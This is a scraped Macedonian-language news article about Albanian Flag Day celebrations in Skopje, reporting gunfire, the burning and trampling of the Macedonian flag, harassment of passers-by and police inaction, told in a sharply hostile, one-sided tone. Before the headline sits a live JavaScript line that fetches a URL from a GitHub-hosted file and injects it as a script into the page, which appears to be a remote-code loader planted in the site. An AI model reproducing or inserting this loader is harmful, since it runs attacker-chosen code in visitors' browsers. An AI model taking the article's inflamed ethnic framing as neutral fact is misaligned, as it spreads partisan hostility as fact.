;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Срамна „прослава“ на албанското знаме: Разјарени толпи дивееја и пукаа со оружје - го палеа и газеа Македонското знаме и малтретираа случајни минувачи - Антропол
АктуелноЛокално

Срамна „прослава“ на албанското знаме: Разјарени толпи дивееја и пукаа со оружје – го палеа и газеа Македонското знаме и малтретираа случајни минувачи

Голем број возила попладнево и вечерва го блокираа главниот град на Македонија со развиорени албански знамиња – се слави Денот на албанското знаме.

На крстосницата кај Мавровка се слушаа и рафални пукотници.

Граѓаните кои се најдоа во централниот дел од Скопје сведочат дека движењето во двата правци било целосно блокирано.

Социјалните мрежи беа преполни со немилите сцени во неколку македонски градови каде се „славеше“.

Во Скопје односно Бит Пазар, македонското знаме било палено, а потоа искинато и фрлено како што може да се види на видеото објавено на Инстаграм:

Во другиот случај на второто видео подолу, автомобил „дрифта“ над македонското знаме. На неколку локации во Скопје се слушаа и рафални пукања, но не се знае од каде доаѓаа.

Ова предизвика револт, а јавноста веќе бара остри казни за сторителите. Двата чина донесоа нетрпеливост и навредливи коментари, што остава простор сторителите да бидат гонети, не за едно, туку за две кривични дела и тоа: нарушување на угледот на државата, но и предизвикување на верска, расна, национална омраза. Според Кривичниот законик, тој што со намера за исмејување јавно ќе ја изложи на подбив Република Македонија, нејзиното знаме, грб или химна, ќе се казни со парична казна.

Полицијата на Панче Тошковски буквално седеше на страна и не реагираше оставајќи ја толпата да дивее по улиците блокирајќи ги истите и малтретирајќи случајни минувачи.